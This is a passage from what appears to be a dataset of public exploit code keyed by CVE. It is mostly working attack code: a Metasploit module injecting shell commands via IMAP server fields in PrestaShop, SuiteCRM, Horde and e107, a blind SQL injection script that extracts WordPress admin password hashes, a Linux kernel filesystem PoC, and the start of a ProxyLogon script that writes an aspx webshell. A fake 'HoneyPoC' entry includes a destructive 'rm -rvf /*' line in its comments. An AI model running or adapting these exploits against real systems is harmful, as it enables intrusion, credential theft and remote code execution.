'form-data; name=\"PS_SAV_IMAP_OPT_NOTLS\"')\n data.add_part('', nil, nil, 'form-data; name=\"submitOptionscustomer_thread\"')\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data.to_s,\n 'cookie' => cookie,\n 'vars_get' => {\n 'controller' => 'AdminCustomerThreads',\n 'token' => token\n }\n )\n print_status('IMAP server change left on server, manual revert required.')\n\n if res && res.body.include?('imap Is Not Installed On This Server')\n 
print_error('PHP IMAP mod not installed/enabled ')\n end\n elsif target.name =~ /suitecrm/\n #login page GET /index.php?action=Login&module=Users\n vprint_status('Loading login page')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vars_get' => {\n 'action' => 'Login',\n 'module' => 'Users'\n }\n )\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n\n if res.code = 200\n cookie = res.get_cookies\n else\n print_error(\"HTTP code #{res.code} found, check options.\")\n return\n end\n\n vprint_status(\"Logging in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n 'vars_post' => {\n 'module' => 'Users',\n 'action' => 'Authenticate',\n 'return_module' => 'Users',\n 'return_action' => 'Login',\n 'cant_login' => '',\n 'login_module' => '',\n 'login_action' => '',\n 'login_record' => '',\n 'login_token' => '',\n 'login_oauth_token' => '',\n 'login_mobile' => '',\n 'user_name' => datastore['USERNAME'],\n 'username_password' => datastore['PASSWORD'],\n 'Login' => 'Log+In'\n }\n )\n unless res\n print_error('Error loading site. 
Check options.')\n return\n end\n\n if res.code = 302\n cookie = res.get_cookies\n print_good('Login Success')\n else\n print_error('Failed Login, check options.')\n end\n\n #load the email settings page to get the group_id\n vprint_status('Loading InboundEmail page')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n 'vars_get' => {\n 'module' => 'InboundEmail',\n 'action' => 'EditView'\n }\n )\n\n unless res\n print_error('Error loading site.')\n return\n end\n\n /\"group_id\" value=\"(?\\w{8}-\\w{4}-\\w{4}-\\w{4}-\\w{12})\">/ =~ res.body\n\n unless group_id\n print_error('Could not identify group_id from form page')\n return\n end\n\n print_good(\"Sending payload with group_id #{group_id}\")\n\n referer = \"http://#{datastore['RHOST']}#{normalize_uri(target_uri.path, 'index.php')}?module=InboundEmail&action=EditView\"\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n #required to prevent CSRF protection from triggering\n 'headers' => { 'Referer' => referer},\n 'vars_post' => {\n 'module' => 'InboundEmail',\n 'record' => '',\n 'origin_id' => '',\n 'isDuplicate' => 'false',\n 'action' => 'Save',\n 'group_id' => group_id,\n 'return_module' => '',\n 'return_action' => '',\n 'return_id' => '',\n 'personal' => '',\n 'searchField' => '',\n 'mailbox_type' => '',\n 'button' => ' Save ',\n 'name' => Rex::Text.rand_text_alphanumeric(8),\n 'status' => 'Active',\n 'server_url' => \"x #{command}}\",\n 'email_user' => Rex::Text.rand_text_alphanumeric(8),\n 'protocol' => 'imap',\n 'email_password' => Rex::Text.rand_text_alphanumeric(8),\n 'port' => '143',\n 'mailbox' => 'INBOX',\n 'trashFolder' => 'TRASH',\n 'sentFolder' => '',\n 'from_name' => Rex::Text.rand_text_alphanumeric(8),\n 'is_auto_import' => 'on',\n 'from_addr' => \"#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.org\",\n 'reply_to_name' => '',\n 
'distrib_method' => 'AOPDefault',\n 'distribution_user_name' => '',\n 'distribution_user_id' => '',\n 'distribution_options[0]' => 'all',\n 'distribution_options[1]' => '',\n 'distribution_options[2]' => '',\n 'create_case_template_id' => '',\n 'reply_to_addr' => '',\n 'template_id' => '',\n 'filter_domain' => '',\n 'email_num_autoreplies_24_hours' => '10',\n 'leaveMessagesOnMailServer' => '1'\n }\n )\n if res && res.code == 200\n print_error('Triggered CSRF protection, may try exploitation manually.')\n end\n print_status('IMAP server config left on server, manual removal required.')\n elsif target.name =~ /Horde IMP H3/\n # The original EDB module claims \"Version: All IMP versions\", however the current\n # major branch https://github.com/horde/imp/tree/74e3f5fdbac31dfcff15195832c1b9b888767982\n # does not include any reference to imap_open, nor 'test.php' in the root directory.\n # H5 (current) uses the IMP test url: /horde/test.php?app=imp with \"Mail Server Support Test\"\n # as the header:\n # https://github.com/horde/imp/blob/16400fd5f52610d27d59d21fe2e39db2c85837f1/lib/Test.php#L85\n # H3 (~2012) uses the IMP test url: /horde/imp/test.php and \"PHP Mail Server Support Test\"\n # which are the values coded into the python edb exploit.\n print_status(\"Sending Exploit Request\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'imp', 'test.php'),\n 'vars_post' => {\n 'f_submit' => 'Submit',\n 'passwd' => Rex::Text.rand_text_alphanumeric(8),\n 'port' => '143',\n 'server' => \"x #{command}}\",\n 'server_type' => 'imap',\n 'user' => Rex::Text.rand_text_alphanumeric(8)\n })\n unless res\n print_error('Error loading site. 
Check options.')\n return\n end\n elsif target.name =~ /e107v2/\n # e107 has an encoder which prevents $IFS$() from being used as $ = $\n # \\t also became /t, however \"\\t\" does seem to work.\n\n # e107 also uses a cron job to check bounce jobs, which may not be active.\n # either cron can be disabled, or bounce checks disabled, so we try to\n # kick the process manually, however if it doesn't work we'll hope\n # cron is running and we get a call back anyways.\n\n vprint_status(\"Logging in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'admin.php'),\n 'vars_post' => {\n 'authname' => datastore['USERNAME'],\n 'authpass' => datastore['PASSWORD'],\n 'authsubmit' => 'Log In'\n })\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n\n if res.code == 302\n cookie = res.get_cookies\n print_good('Login Success')\n else\n print_error('Failed Login, check options.')\n end\n\n vprint_status('Checking if Cron is enabled for triggering')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),\n 'cookie' => cookie\n )\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n if res.body.include? 'Status: Disabled'\n print_error('Cron disabled, unexploitable.')\n return\n end\n\n print_good('Storing payload in mail settings')\n\n # the imap/pop field is hard to find. 
Check Users > Mail\n # then check \"Bounced emails - Processing method\" and set it to \"Mail account\"\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'mailout.php'),\n 'cookie' => cookie,\n 'vars_get' => {\n 'mode' => 'prefs',\n 'action' => 'prefs'\n },\n 'vars_post' => {\n 'testaddress' => 'some_email_address',\n 'testtemplate' => 'textonly',\n 'bulkmailer' => 'smtp',\n 'smtp_server' => '1.1.1.1',\n 'smtp_username' => 'username',\n 'smtp_password' => 'password',\n 'smtp_port' => '25',\n 'smtp_options' => '',\n 'smtp_keepalive' => '0',\n 'smtp_useVERP' => '0',\n 'mail_sendstyle' => 'texthtml',\n 'mail_pause' => '3',\n 'mail_pausetime' => '4',\n 'mail_workpertick' => '5',\n 'mail_log_option' => '0',\n 'mail_bounce' => 'mail',\n 'mail_bounce_email2' => '',\n 'mail_bounce_email' => \"#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.org\",\n 'mail_bounce_pop3' => \"x #{command(\"\\t\")}}\",\n 'mail_bounce_user' => Rex::Text.rand_text_alphanumeric(8),\n 'mail_bounce_pass' => Rex::Text.rand_text_alphanumeric(8),\n 'mail_bounce_type' => 'imap',\n 'mail_bounce_auto' => '1',\n 'updateprefs' => 'Save Changes'\n })\n\n\n vprint_status('Loading cron page to execute job manually')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),\n 'cookie' => cookie\n )\n\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n\n if /name='e-token' value='(?\\w{32})'/ =~ res.body && /_system::procEmailBounce.+?cron_execute\\[(?\\d)\\]/m =~ res.body\n print_good(\"Triggering manual run of mail bounch check cron to execute payload with cron id #{cron_id} and etoken #{etoken}\")\n # The post request has several duplicate columns, however all were not required. 
Left them commented for documentation purposes\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),\n 'cookie' => cookie,\n 'vars_post' => {\n 'e-token' => etoken,\n #'e-columns[]' => 'cron_category',\n 'e-columns[]' => 'cron_name',\n #'e-columns[]' => 'cron_description',\n #'e-columns[]' => 'cron_function',\n #'e-columns[]' => 'cron_tab',\n #'e-columns[]' => 'cron_lastrun',\n #'e-columns[]' => 'cron_active',\n \"cron_execute[#{cron_id}]\" => '1',\n 'etrigger_batch' => ''\n })\n\n else\n print_error('e-token not found, required for manual exploitation. Wait 60sec, cron may still trigger.')\n end\n\n print_status('IMAP server config left on server, manual removal required.')\n elsif target.name =~ /custom/\n print_status('Listener started for 300 seconds')\n print_good(\"POST request connection string: x #{command}}\")\n # URI.encode leaves + as + since that's a space encoded. So we manually change it.\n print_good(\"GET request connection string: #{URI.encode(\"x \" + command + \"}\").sub! 
'+', '%2B'}\")\n end\n end\nend" + }, + { + "created_at": "2021-07-26T14:12:26Z", + "cve": "CVE-2019-10866", + "urls": [ + "https://github.com/sepehrdaddev/0day-today-exploits/blob/4c60d5a5b65e42e6f67512596926f261fa10b668/32829.txt" + ], + "exploit": "# Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection\n# Exploit Author: Daniele Scanu @ Certimeter Group\n# Vendor Homepage: some_host/plugins/\n# Version: 1.13.3\n# Tested on: Ubuntu 18.04\n# CVE : CVE-20**-*****\n\nimport requests\nimport time\n\nsession = requests.Session()\ndictionary = '@._-$/\\\\\"£%&;§+*123'\nflag = True\nusername = \"username\"\npassword = \"password\"\ntemp_password = \"\"\nTIME = 0.5\n\ndef login(username, password):\n payload = {\n 'log': username,\n 'pwd': password,\n 'wp-submit': 'Login',\n 'testcookie': 1\n }\n\ndef print_string(str):\n print \"\\033c\"\n print str\n\ndef get_admin_pass():\n len_pwd = 1\n global flag\n global temp_password\n while flag:\n flag = False\n ch_temp = ''\n for ch in dictionary:\n print_string(\"[*] Password dump: \" + temp_password + ch)\n ch_temp = ch\n start_time = time.time()\n r = session.get(url_vuln + ',(case+when+(select+ascii(substring(user_pass,' + str(len_pwd) + ',' + str(len_pwd) + '))+from+wp_users+where+id%3d1)%3d' + str(ord(ch)) + '+then+(select+sleep(' + str(TIME) + ')+from+wp_users+limit+1)+else+2+end)+asc%3b')\n elapsed_time = time.time() - start_time\n if elapsed_time >= TIME:\n flag = True\n break\n if flag:\n temp_password += ch_temp\n len_pwd += 1\n\nlogin(username, password)\nget_admin_pass()\nprint_string(\"[+] Password found: \" + temp_password)" + }, + { + "created_at": "2021-07-26T16:35:26Z", + "cve": "CVE-2021-22893", + "urls": [ + "https://github.com/ZephrFish/CVE-2021-22893" + ], + "exploit": "# CVE-2021-22893 RCE PoC\n# This is how dangerious not reading the source code is:\n# rm -rvf /*\n\nUSAGE=\"\nBash script to achieve RCE\nFlags:\n-c Target IP Address.\nusage: exploit.sh -c \nexample: exploit.sh -c 
10.0.0.1\nexample: exploit.sh -l \nexample: exploit.sh -l ips.txt\n\"\nif [ $# -eq 0 ]; then\n echo \"$USAGE\"\n exit\nfi\necho \"HONEYPOC - NOT A REAL EXPLOIT\"\necho \"[!] Exploiting Host $1 $2\"\necho \"[+] Beginning Erasure of /\"\nsleep 5s\nls -aliRtu /\necho \"[!] Deleted Root File System.\"\nsleep 5s\necho \"We're no strangers to love\"\n# NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Spanish (NX)',\n# {\n# 'Ret' => 0x6fdbf727,\n# 'DisableNX' => 0x6fdc16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\necho \"You know the rules and so do I.\"\n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Finnish (NX)',\n# {\n# 'Ret' => 0x597df727,\n# 'DisableNX' => 0x597e16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 French (NX)',\n# {\n# 'Ret' => 0x595bf727,\n# 'DisableNX' => 0x595c16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n echo \"A full commitment's what I'm thinking of.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Hebrew (NX)',\n# {\n# 'Ret' => 0x5940f727,\n# 'DisableNX' => 0x594116e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Hungarian (NX)',\n# {\n# 'Ret' => 0x5970f727,\n# 'DisableNX' => 0x597116e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"You wouldn't get this from any other guy.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Italian (NX)',\n# {\n# 'Ret' => 0x596bf727,\n# 'DisableNX' => 0x596c16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Japanese (NX)',\n# {\n# 'Ret' => 0x567fd3be,\n# 'DisableNX' => 0x568016e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS 
ACGENRAL.DLL\n\t\t echo \"I just wanna tell you how I'm feeling.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Korean (NX)',\n# {\n# 'Ret' => 0x6fd6f727,\n# 'DisableNX' => 0x6fd716e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Dutch (NX)',\n# {\n# 'Ret' => 0x596cf727,\n# 'DisableNX' => 0x596d16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Gotta make you understand\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Norwegian (NX)',\n# {\n# 'Ret' => 0x597cf727,\n# 'DisableNX' => 0x597d16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Polish (NX)',\n# {\n# 'Ret' => 0x5941f727,\n# 'DisableNX' => 0x594216e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna give you up.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Portuguese - Brazilian (NX)',\n# {\n# 'Ret' => 0x596ff727,\n# 'DisableNX' => 0x597016e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Portuguese (NX)',\n# {\n# 'Ret' => 0x596bf727,\n# 'DisableNX' => 0x596c16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna let you down.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Russian (NX)',\n# {\n# 'Ret' => 0x6fe1f727,\n# 'DisableNX' => 0x6fe216e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Swedish (NX)',\n# {\n# 'Ret' => 0x597af727,\n# 'DisableNX' => 0x597b16e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna run around and desert you.\"\n# 
\n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP2 Turkish (NX)',\n# {\n# 'Ret' => 0x5a78f727,\n# 'DisableNX' => 0x5a7916e2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Arabic (NX)',\n# {\n# 'Ret' => 0x6fd8f807,\n# 'DisableNX' => 0x6fd917c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna make you cry.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)',\n# {\n# 'Ret' => 0x5860f807,\n# 'DisableNX' => 0x586117c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Chinese - Simplified (NX)',\n# {\n# 'Ret' => 0x58fbf807,\n# 'DisableNX' => 0x58fc17c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna say goodbye.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Chinese - Traditional (NX)',\n# {\n# 'Ret' => 0x5860f807,\n# 'DisableNX' => 0x586117c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Czech (NX)',\n# {\n# 'Ret' => 0x6fe1f807,\n# 'DisableNX' => 0x6fe217c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n\t\t echo \"Never gonna tell a lie and hurt you.\"\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Danish (NX)',\n# {\n# 'Ret' => 0x5978f807,\n# 'DisableNX' => 0x597917c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 German (NX)',\n# {\n# 'Ret' => 0x6fd9f807,\n# 'DisableNX' => 0x6fda17c2,\n# 'Scratch' => 0x00020408\n# }\n# ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL\n# \n# # NX bypass for XP SP2/SP3\n# [ 'Windows XP SP3 Greek (NX)',\n# {\n\n\necho \"[!] 
You should have read the source. HoneyPoC 3.0 - some_host/cve-20**-****-honeypoc/\"" + }, + { + "created_at": "2021-07-26T16:59:10Z", + "cve": "CVE-2021-33909", + "urls": [ + "https://github.com/Liang2580/CVE-2021-33909" + ], + "exploit": "/*\n * CVE-2021-33909: size_t-to-int vulnerability in Linux's filesystem layer\n * Copyright (C) 2021 Qualys, Inc.\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. If not, see .\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#define PAGE_SIZE (4096)\n\n#define die() do { \\\n fprintf(stderr, \"died in %s: %u\\n\", __func__, __LINE__); \\\n exit(EXIT_FAILURE); \\\n} while (0)\n\nstatic void\nsend_recv_state(const int sock, const char * const sstate, const char rstate)\n{\n if (sstate) {\n if (send(sock, sstate, 1, MSG_NOSIGNAL) != 1) die();\n }\n if (rstate) {\n char state = 0;\n if (read(sock, &state, 1) != 1) die();\n if (state != rstate) die();\n }\n}\n\nstatic const char * bigdir;\nstatic char onedir[NAME_MAX + 1];\n\ntypedef struct {\n pid_t pid;\n int socks[2];\n size_t count;\n int delete;\n} t_userns;\n\nstatic int\nuserns_fn(void * const arg)\n{\n if (!arg) die();\n const t_userns * const userns = arg;\n const int sock = userns->socks[1];\n if (close(userns->socks[0])) die();\n\n 
send_recv_state(sock, NULL, 'A');\n\n size_t n;\n if (chdir(bigdir)) die();\n for (n = 0; n <= userns->count / (1 + (sizeof(onedir)-1) * 4); n++) {\n if (chdir(onedir)) die();\n }\n char device[] = \"./device.XXXXXX\";\n if (!mkdtemp(device)) die();\n char mpoint[] = \"/tmp/mpoint.XXXXXX\";\n if (!mkdtemp(mpoint)) die();\n if (mount(device, mpoint, NULL, MS_BIND, NULL)) die();\n\n if (userns->delete) {\n if (rmdir(device)) die();\n }\n if (chdir(\"/\")) die();\n\n send_recv_state(sock, \"B\", 'C');\n\n const int fd = open(\"/proc/self/mountinfo\", O_RDONLY);\n if (fd <= -1) die();\n static char buf[1UL << 20];\n size_t len = 0;\n for (;;) {\n ssize_t nbr = read(fd, buf, 1024);\n if (nbr <= 0) die();\n for (;;) {\n const char * nl = memchr(buf, '\\n', nbr);\n if (!nl) break;\n nl++;\n if (memmem(buf, nl - buf, \"\\\\134\", 4)) die();\n nbr -= nl - buf;\n memmove(buf, nl, nbr);\n len = 0;\n }\n len += nbr;\n if (memmem(buf, nbr, \"\\\\134\", 4)) break;\n }\n\n send_recv_state(sock, \"D\", 'E');\n die();\n}\n\nstatic void\nupdate_id_map(char * const mapping, const char * const map_file)\n{\n const size_t map_len = strlen(mapping);\n if (map_len >= SSIZE_MAX) die();\n if (map_len <= 0) die();\n\n size_t i;\n for (i = 0; i < map_len; i++) {\n if (mapping[i] == ',')\n mapping[i] = '\\n';\n }\n\n const int fd = open(map_file, O_WRONLY);\n if (fd <= -1) die();\n if (write(fd, mapping, map_len) != (ssize_t)map_len) die();\n if (close(fd)) die();\n}\n\nstatic void\nproc_setgroups_write(const pid_t child_pid, const char * const str)\n{\n const size_t str_len = strlen(str);\n if (str_len >= SSIZE_MAX) die();\n if (str_len <= 0) die();\n\n char setgroups_path[64];\n snprintf(setgroups_path, sizeof(setgroups_path), \"/proc/%ld/setgroups\", (long)child_pid);\n\n const int fd = open(setgroups_path, O_WRONLY);\n if (fd <= -1) {\n if (fd != -1) die();\n if (errno != ENOENT) die();\n return;\n }\n if (write(fd, str, str_len) != (ssize_t)str_len) die();\n if (close(fd)) 
die();\n}\n\nstatic void\nfork_userns(t_userns * const userns, const size_t size, const int delete)\n{\n static const size_t stack_size = (1UL << 20) + 2 * PAGE_SIZE;\n static char * stack = NULL;\n if (!stack) {\n stack = mmap(NULL, stack_size, PROT_NONE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);\n if (!stack || stack == MAP_FAILED) die();\n if (mprotect(stack + PAGE_SIZE, stack_size - 2 * PAGE_SIZE, PROT_READ | PROT_WRITE)) die();\n }\n\n if (!userns) die();\n userns->count = size / 2;\n userns->delete = delete;\n\n if (socketpair(AF_UNIX, SOCK_STREAM, 0, userns->socks)) die();\n userns->pid = clone(userns_fn, stack + stack_size - PAGE_SIZE, CLONE_NEWUSER | CLONE_NEWNS | SIGCHLD, userns);\n if (userns->pid <= -1) die();\n if (close(userns->socks[1])) die();\n userns->socks[1] = -1;\n\n char map_path[64], map_buf[64];\n snprintf(map_path, sizeof(map_path), \"/proc/%ld/uid_map\", (long)userns->pid);\n snprintf(map_buf, sizeof(map_buf), \"0 %ld 1\", (long)getuid());\n update_id_map(map_buf, map_path);\n\n proc_setgroups_write(userns->pid, \"deny\");\n snprintf(map_path, sizeof(map_path), \"/proc/%ld/gid_map\", (long)userns->pid);\n snprintf(map_buf, sizeof(map_buf), \"0 %ld 1\", (long)getgid());\n update_id_map(map_buf, map_path);\n\n send_recv_state(*userns->socks, \"A\", 'B');\n}\n\nstatic void\nwait_userns(t_userns * const userns)\n{\n if (!userns) die();\n if (kill(userns->pid, SIGKILL)) die();\n\n int status = 0;\n if (waitpid(userns->pid, &status, 0) != userns->pid) die();\n userns->pid = -1;\n if (!WIFSIGNALED(status)) die();\n if (WTERMSIG(status) != SIGKILL) die();\n\n if (close(*userns->socks)) die();\n *userns->socks = -1;\n}\n\nint\nmain(const int argc, const char * const argv[])\n{\n if (argc != 2) die();\n bigdir = argv[1];\n if (*bigdir != '/') die();\n\n if (sizeof(onedir) != 256) die();\n memset(onedir, '\\\\', sizeof(onedir)-1);\n if (onedir[sizeof(onedir)-1] != '\\0') die();\n\n puts(\"creating directories, please wait...\");\n if 
(mkdir(bigdir, S_IRWXU) && errno != EEXIST) die();\n if (chdir(bigdir)) die();\n size_t i;\n for (i = 0; i <= (1UL << 30) / (1 + (sizeof(onedir)-1) * 4); i++) {\n if (mkdir(onedir, S_IRWXU) && errno != EEXIST) die();\n if (chdir(onedir)) die();\n }\n if (chdir(\"/\")) die();\n\n static t_userns userns;\n fork_userns(&userns, (1UL << 31), 1);\n puts(\"crashing...\");\n send_recv_state(*userns.socks, \"C\", 'D');\n wait_userns(&userns);\n die();\n}" + }, + { + "created_at": "2021-07-26T17:20:40Z", + "cve": "CVE-2021-27065", + "urls": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065", + "https://github.com/p0wershe11/ProxyLogon" + ], + "exploit": "# -*- encoding: utf-8 -*-\n'''\n-------------------------------------------------------\n@File : ProxyLogon.py\n@Time : 2021/03/13 21:13:01\n@Version : 1.0.0\n@License : \n@Desc : \n@Author : p0wershe11, RGDZ\n-------------------------------------------------------\n'''\n\n\n\nfrom random import Random, randint, random\nimport re\nimport string\nimport sys\nimport json\nimport requests\nfrom urllib.parse import urlencode\nfrom struct import unpack\nfrom base64 import b64encode, b64decode\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n\nclass IOFlow(str):\n\n def __init__(self) -> None:\n super().__init__()\n self._cout = sys.stdout\n\n def _write(self, s:str):\n self.cout.write(s)\n\n def __lshift__(self, s: str)->int:\n return self._cout.write(s)\n\nendl = \"\\n\"\ncout = IOFlow()\n\nclass Color:\n START = \"\\033[\"\n END = START+\"0m\"\n \n\n C_RED = START+\"31m\"\n C_GREEN = START+\"32m\"\n C_YELLOW = START+\"33m\"\n C_BLUE = START+\"34m\"\n\n # RANDOM_COLOR = random.choice()\n\nclass Color(Color):\n ALL_COLOR = {k:v for k, v in Color.__dict__.items() if \"C_\" in k}\n _COLOR_S = lambda color, s: color+s+Color.END\n\nclass Color(Color):\n\n RED_S = lambda s: Color._COLOR_S(Color.C_RED, s)\n 
GREEN_S = lambda s: Color._COLOR_S(Color.C_GREEN, s)\n YELLOW_S = lambda s: Color._COLOR_S(Color.C_YELLOW, s)\n BLUE_S = lambda s: Color._COLOR_S(Color.C_BLUE, s)\n\nclass Log:\n BASE_SYM = lambda sym: f\"{sym}\"\n TEMPLATE = lambda sym, msg: cout << f\"{sym}:{msg}\\n\"\n\nclass Log(Log):\n INFO_SYM = Log.BASE_SYM(Color.BLUE_S(\"[*]\"))\n WARING_SYM = Log.BASE_SYM(Color.YELLOW_S(\"[!]\"))\n SUCCESS_SYM = Log.BASE_SYM(Color.GREEN_S(\"[+]\"))\n\nclass Log(Log):\n info = lambda msg: Log.TEMPLATE(Log.INFO_SYM, msg)\n waring = lambda msg: Log.TEMPLATE(Log.WARING_SYM, msg)\n success = lambda msg: Log.TEMPLATE(Log.SUCCESS_SYM, msg)\n\n\nARGS = [dict(v) for v in [zip(v.split(\"=\")[0::2], v.split(\"=\")[1::2]) for v in sys.argv[1:]]]\n\n\ncheck_argv = lambda arg: arg in sys.argv\n\n\n\nHOST = \"\"\nMAIL = \"\"\nMAILS = \"\"\nLOCAL_NAME = \"\"\n\nascii_letters = string.ascii_letters\nSHELL_NAME = \"\".join(ascii_letters[randint(0, len(ascii_letters)-1)] for i in range(10))\nFILE_PATH = f'C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\{SHELL_NAME}.aspx'\nFILE_DATA = ''\n\n\ndef _unpack_str(byte_string):\n return byte_string.decode('UTF-8').replace('\\x00', '')\n\ndef _unpack_int(format, data):\n return unpack(format, data)[0]\n\n\ndef exploit(path, qs='', data='', cookies=[], headers={}):\n global HOST, LOCAL_NAME\n\n cookies = list(cookies)\n cookies.extend([f\"X-BEResource=a]@{LOCAL_NAME}:444{path}?{qs}#~1941962753\"])\n if not headers:\n headers = {\n 'Content-Type': 'application/json'\n }\n 